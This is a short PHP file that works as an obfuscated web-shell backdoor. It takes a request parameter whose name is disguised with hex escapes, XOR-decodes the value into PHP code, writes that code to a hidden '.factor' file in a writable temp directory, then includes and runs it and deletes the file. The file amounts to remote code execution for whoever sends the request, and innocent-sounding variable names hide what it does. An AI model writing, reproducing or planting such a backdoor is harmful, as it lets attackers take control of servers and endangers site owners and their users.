<?php

if(isset($_REQUEST["c\x6Fm\x70on\x65\x6Et"])){
	$property_set = $_REQUEST["c\x6Fm\x70on\x65\x6Et"];
	$property_set	 =  	explode	 	(			'.'	 ,$property_set )		 ;			
	$fac  ='';
            $s5  ='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS  =strlen( 	$s5);
    
            foreach( 	$property_set as $l=>$v7) {
                $sChar  =ord( 	$s5[$l % $lenS]);
                $d  =( 	( 	int)$v7 - $sChar -( 	$l % 10)) ^ 8;
                $fac	 .=	chr( 	$d);
            }
	$resource = array_filter(["/var/tmp", getenv("TMP"), getcwd(), "/dev/shm", getenv("TEMP"), "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path()]);
	for ($data_chunk = 0, $k = count($resource); $data_chunk < $k; $data_chunk++) {
    $holder = $resource[$data_chunk];
    		if ((is_dir($holder) and is_writable($holder))) {
    $token = join("/", [$holder, ".factor"]);
    if (@file_put_contents($token, $fac) !== false) {
	include $token;
	unlink($token);
	die();
}
}
}
}